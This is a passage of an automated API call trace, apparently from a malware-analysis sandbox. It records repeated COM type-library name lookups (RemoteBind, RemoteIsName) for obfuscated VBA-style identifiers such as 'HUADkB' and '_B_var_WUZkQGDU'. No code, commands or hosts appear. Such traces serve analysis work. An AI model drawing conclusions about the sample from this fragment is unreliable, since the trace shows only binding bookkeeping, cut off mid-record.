_DstSizeInBytes=0x9, _Src=0x3b819ce | out: _Dst=0x67c2d40) returned 0x0 [0069.717] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_lQAX1X_A") returned 0x10718c [0069.717] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_lQAX1X_A" | out: _Dst="_B_var_lQAX1X_A") returned 0x0 [0069.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_lQAX1X_A") returned 16 [0069.717] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.717] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_lQAX1X_A", lHashVal=0x10718c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.717] IUnknown:Release (This=0x665ba50) returned 0xd [0069.717] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.717] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_lQAX1X_A", lHashVal=0x10718c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.718] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.718] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.718] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_lQAX1X_A", lHashVal=0x10718c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.718] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.718] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.718] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_lQAX1X_A", lHashVal=0x10718c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.718] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.718] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.718] IUnknown:Release (This=0x665ba50) returned 0xd [0069.718] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa870d9e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_lQAX1X_A") returned 16 [0069.718] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_lQAX1X_A", lHashVal=0x10718c, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6c005f00720061, ppTypeComp=0x31005800000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6c005f00720061, ppTypeComp=0x31005800000000, pDummy=0x0) returned 0x0 [0069.718] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b819ce | out: _Dst=0x144ec0) returned 0x0 [0069.718] ITypeComp:RemoteBind (in: This=0x665ba60, szName="HUADkB", lHashVal=0x106cf9, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81aca, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="HUADkB") returned 7 [0069.719] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="HUADkB", lHashVal=0x106cf9, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81aca, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="HUADkB") returned 7 [0069.719] ITypeComp:RemoteBind (in: This=0x665bd30, szName="HUADkB", lHashVal=0x106cf9, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.719] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HUADkB") returned 0x106cf9 [0069.719] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="HUADkB" | out: _Dst="HUADkB") returned 0x0 [0069.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="HUADkB") returned 7 [0069.719] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.719] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="HUADkB", lHashVal=0x106cf9, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.719] IUnknown:Release (This=0x665ba50) returned 0xd [0069.719] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.719] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="HUADkB", lHashVal=0x106cf9, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.719] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.720] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.720] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="HUADkB", lHashVal=0x106cf9, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.720] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.720] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.720] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="HUADkB", lHashVal=0x106cf9, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.720] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.720] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81aca, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="HUADkB") returned 7 [0069.720] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="HUADkB", lHashVal=0x106cf9, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.720] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.720] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b81aca | out: _Dst=0x67c2d40) returned 0x0 [0069.720] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_HUADkB") returned 0x10e7a2 [0069.720] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_HUADkB" | out: _Dst="_B_var_HUADkB") returned 0x0 [0069.720] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_HUADkB") returned 14 [0069.720] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.720] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_HUADkB", lHashVal=0x10e7a2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.720] IUnknown:Release (This=0x665ba50) returned 0xd [0069.720] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.720] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_HUADkB", lHashVal=0x10e7a2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.721] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.721] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.721] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_HUADkB", lHashVal=0x10e7a2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.721] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.721] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.721] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_HUADkB", lHashVal=0x10e7a2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.721] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.721] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.721] IUnknown:Release (This=0x665ba50) returned 0xd [0069.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa870dce, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_HUADkB") returned 14 [0069.721] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_HUADkB", lHashVal=0x10e7a2, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x48005f00720061, ppTypeComp=0x6b004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x48005f00720061, ppTypeComp=0x6b004400000000, pDummy=0x0) returned 0x0 [0069.721] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b81aca | out: _Dst=0x144ec0) returned 0x0 [0069.721] ITypeComp:RemoteBind (in: This=0x665ba60, szName="WUZkQGDU", lHashVal=0x10a5e8, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81a9e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="WUZkQGDU") returned 9 [0069.721] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="WUZkQGDU", lHashVal=0x10a5e8, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81a9e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="WUZkQGDU") returned 9 [0069.722] ITypeComp:RemoteBind (in: This=0x665bd30, szName="WUZkQGDU", lHashVal=0x10a5e8, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.722] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WUZkQGDU") returned 0x10a5e8 [0069.722] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="WUZkQGDU" | out: _Dst="WUZkQGDU") returned 0x0 [0069.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="WUZkQGDU") returned 9 [0069.722] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.722] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="WUZkQGDU", lHashVal=0x10a5e8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.722] IUnknown:Release (This=0x665ba50) returned 0xd [0069.722] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.722] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="WUZkQGDU", lHashVal=0x10a5e8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.722] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.722] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.722] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="WUZkQGDU", lHashVal=0x10a5e8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.722] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.722] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.722] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="WUZkQGDU", lHashVal=0x10a5e8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.722] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81a9e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="WUZkQGDU") returned 9 [0069.722] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="WUZkQGDU", lHashVal=0x10a5e8, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.723] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.723] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b81a9e | out: _Dst=0x67c2d40) returned 0x0 [0069.723] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_WUZkQGDU") returned 0x107d71 [0069.723] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_WUZkQGDU" | out: _Dst="_B_var_WUZkQGDU") returned 0x0 [0069.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_WUZkQGDU") returned 16 [0069.723] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.723] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_WUZkQGDU", lHashVal=0x107d71, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.723] IUnknown:Release (This=0x665ba50) returned 0xd [0069.723] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.723] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_WUZkQGDU", lHashVal=0x107d71, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.723] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.723] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.723] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_WUZkQGDU", lHashVal=0x107d71, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.723] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.723] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.723] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_WUZkQGDU", lHashVal=0x107d71, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.723] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.723] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.723] IUnknown:Release (This=0x665ba50) returned 0xd [0069.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa870dfe, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_WUZkQGDU") returned 16 [0069.723] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_WUZkQGDU", lHashVal=0x107d71, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x57005f00720061, ppTypeComp=0x51006b00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x57005f00720061, ppTypeComp=0x51006b00000000, pDummy=0x0) returned 0x0 [0069.723] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b81a9e | out: _Dst=0x144ec0) returned 0x0 [0069.723] ITypeComp:RemoteBind (in: This=0x665ba60, szName="WDAAUDD4", lHashVal=0x10ad09, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81af2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="WDAAUDD4") returned 9 [0069.724] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="WDAAUDD4", lHashVal=0x10ad09, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81af2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="WDAAUDD4") returned 9 [0069.724] ITypeComp:RemoteBind (in: This=0x665bd30, szName="WDAAUDD4", lHashVal=0x10ad09, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.724] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WDAAUDD4") returned 0x10ad09 [0069.724] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="WDAAUDD4" | out: _Dst="WDAAUDD4") returned 0x0 [0069.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="WDAAUDD4") returned 9 [0069.724] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.724] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="WDAAUDD4", lHashVal=0x10ad09, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.724] IUnknown:Release (This=0x665ba50) returned 0xd [0069.724] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.724] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="WDAAUDD4", lHashVal=0x10ad09, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.724] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.724] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.724] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="WDAAUDD4", lHashVal=0x10ad09, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.724] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.724] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.724] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="WDAAUDD4", lHashVal=0x10ad09, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.724] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81af2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="WDAAUDD4") returned 9 [0069.724] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="WDAAUDD4", lHashVal=0x10ad09, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.724] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.724] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b81af2 | out: _Dst=0x67c2d40) returned 0x0 [0069.724] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_WDAAUDD4") returned 0x108492 [0069.724] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_WDAAUDD4" | out: _Dst="_B_var_WDAAUDD4") returned 0x0 [0069.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_WDAAUDD4") returned 16 [0069.725] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.725] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_WDAAUDD4", lHashVal=0x108492, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.725] IUnknown:Release (This=0x665ba50) returned 0xd [0069.725] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.725] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_WDAAUDD4", lHashVal=0x108492, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.725] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.725] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.725] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_WDAAUDD4", lHashVal=0x108492, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.725] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.725] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.725] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_WDAAUDD4", lHashVal=0x108492, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.725] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.725] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.725] IUnknown:Release (This=0x665ba50) returned 0xd [0069.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa870e2e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_WDAAUDD4") returned 16 [0069.725] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_WDAAUDD4", lHashVal=0x108492, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x57005f00720061, ppTypeComp=0x55004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x57005f00720061, ppTypeComp=0x55004100000000, pDummy=0x0) returned 0x0 [0069.725] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b81af2 | out: _Dst=0x144ec0) returned 0x0 [0069.725] ITypeComp:RemoteBind (in: This=0x665ba60, szName="kXAA1CA", lHashVal=0x10a68d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81b1e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="kXAA1CA") returned 8 [0069.725] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="kXAA1CA", lHashVal=0x10a68d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81b1e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="kXAA1CA") returned 8 [0069.725] ITypeComp:RemoteBind (in: This=0x665bd30, szName="kXAA1CA", lHashVal=0x10a68d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.726] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="kXAA1CA") returned 0x10a68d [0069.726] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="kXAA1CA" | out: _Dst="kXAA1CA") returned 0x0 [0069.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="kXAA1CA") returned 8 [0069.726] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.726] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="kXAA1CA", lHashVal=0x10a68d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.726] IUnknown:Release (This=0x665ba50) returned 0xd [0069.726] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.726] ITypeLib:RemoteIsName (in: This=0x631b4c0, 